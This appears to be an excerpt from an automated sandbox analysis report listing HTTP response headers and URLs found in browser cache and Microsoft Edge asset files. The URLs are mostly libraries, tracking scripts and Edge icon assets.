    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 16:33:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 8fc464cc5a7d18f6-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1486&rtt_var=743&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4266&recv_bytes=1282&delivery_rate=140431&cwnd=215&unsent_bytes=0&cid=ffa5418d467019f4&ts=363&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 16:34:07 GMTContent-Type: text/htmlContent-Length: 553Connection: closeServer: cloudflareCF-RAY: 8fc464fe3bfb4249-EWRX-Frame-Options: DENYX-Content-Type-Options: nosniff
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 16:34:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 8fc464ff6fef15cb-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1503&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1262&delivery_rate=1923583&cwnd=178&unsent_bytes=0&cid=08a4ba078752c85f&ts=483&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 16:34:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 16:34:46 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 12Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomainsPermissions-Policy: geolocation=(), camera=(), microphone=()Referrer-Policy: strict-origin-when-cross-originX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockSet-Cookie: __cf_bm=sA0Puuj4aXXOS9KKMfdzZRompObTn8nevRbfCX0BIEU-1735922086-1.0.1.1-v5wJ6ZPtp0cs24RuD4s5VyqIJFdLtUS1TOEukCZ9oRa4EvdVq7kg_DDCjs743uOsGY4q8SxarmOMxkHpTEWrVdh1w1818KTCqDpEU0LMHF0; path=/; expires=Fri, 03-Jan-25 17:04:46 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzD4PwxRLs%2FvgqTiL9Zv%2BYSo0pSXzfSD0QdGb0kKr0jiFSZ%2F5SR6ByT3a8HifCKRfppSM6%2FsbNuVx9ltTANLjYnS55Ei3S5LqLa4yyQzU6LiZNNNPexl%2FmVNEfbXpsd4uawYiQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fc465ef9e47437f-EWRalt-svc: h3=":443"; ma=86400
    Source: chromecache_652.1.dr, chromecache_434.1.drString found in binary or memory: http://artsy.github.io/blog/2012/10/18/so-you-want-to-do-a-css3-3d-transform/
    Source: chromecache_441.1.dr, chromecache_491.1.drString found in binary or memory: http://aviathemes.com
    Source: chromecache_582.1.dr, chromecache_577.1.drString found in binary or memory: http://blog.christoffer.me/six-things-i-learnt-about-ios-safaris-rubber-band-scrolling/
    Source: chromecache_379.1.dr, chromecache_456.1.dr, chromecache_465.1.dr, chromecache_458.1.dr, chromecache_603.1.dr, chromecache_492.1.drString found in binary or memory: http://cipa.jp/exif/1.0/
    Source: chromecache_653.1.dr, chromecache_410.1.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/
    Source: chromecache_607.1.drString found in binary or memory: http://fontawesome.com
    Source: chromecache_607.1.drString found in binary or memory: http://fontawesome.com/license
    Source: chromecache_494.1.dr, chromecache_606.1.drString found in binary or memory: http://github.com/benbarnett/jQuery-Animate-Enhanced
    Source: chromecache_644.1.drString found in binary or memory: http://gmpg.org/xfn/11
    Source: chromecache_535.1.dr, chromecache_381.1.drString found in binary or memory: http://jquery.com
    Source: chromecache_441.1.dr, chromecache_491.1.drString found in binary or memory: http://kriesi.at
    Source: chromecache_582.1.dr, chromecache_577.1.drString found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
    Source: chromecache_429.1.drString found in binary or memory: http://opensource.org/licenses/MIT
    Source: chromecache_412.1.drString found in binary or memory: http://papermashup.com/demos/css-buttons)
    Source: chromecache_582.1.dr, chromecache_577.1.drString found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
    Source: chromecache_601.1.drString found in binary or memory: http://projects.lukehaas.me/css-loaders/
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: http://tizen.org/system/tizenid
    Source: msapplication.xml2.14.drString found in binary or memory: http://www.google.com/
    Source: msapplication.xml4.14.drString found in binary or memory: http://www.nytimes.com/
    Source: msapplication.xml6.14.drString found in binary or memory: http://www.twitter.com/
    Source: msapplication.xml7.14.drString found in binary or memory: http://www.wikipedia.com/
    Source: chromecache_426.1.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
    Source: chromecache_426.1.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
    Source: chromecache_396.1.dr, chromecache_432.1.drString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
    Source: chromecache_644.1.drString found in binary or memory: https://api.w.org/
    Source: chromecache_426.1.dr, chromecache_510.1.drString found in binary or memory: https://apis.google.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://bard.google.com/
    Source: Reporting and NEL.22.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
    Source: offscreendocument_main.js.21.dr, service_worker_bin_prod.js.21.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
    Source: manifest.json0.21.drString found in binary or memory: https://chrome.google.com/webstore/
    Source: manifest.json0.21.drString found in binary or memory: https://chromewebstore.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: chromecache_426.1.drString found in binary or memory: https://clients6.google.com
    Source: chromecache_548.1.dr, chromecache_624.1.drString found in binary or memory: https://connect.facebook.net/
    Source: chromecache_396.1.dr, chromecache_432.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: chromecache_548.1.dr, chromecache_624.1.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
    Source: chromecache_426.1.drString found in binary or memory: https://content.googleapis.com
    Source: chromecache_429.1.drString found in binary or memory: https://daneden.github.io/animate.css/
    Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: chromecache_597.1.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
    Source: chromecache_428.1.drString found in binary or memory: https://dmp.adform.net/serving/cookie/match?party=1123
    Source: manifest.json.21.drString found in binary or memory: https://docs.google.com/
    Source: chromecache_426.1.drString found in binary or memory: https://domains.google.com/suggest/flow
    Source: manifest.json.21.drString found in binary or memory: https://drive-autopush.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-0.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-1.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-2.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-3.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-4.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-5.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-daily-6.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-preprod.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive-staging.corp.google.com/
    Source: manifest.json.21.drString found in binary or memory: https://drive.google.com/
    Source: 000003.log6.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
    Source: 000003.log6.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
    Source: 000003.log6.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
    Source: 000003.log7.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
    Source: 000003.log6.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
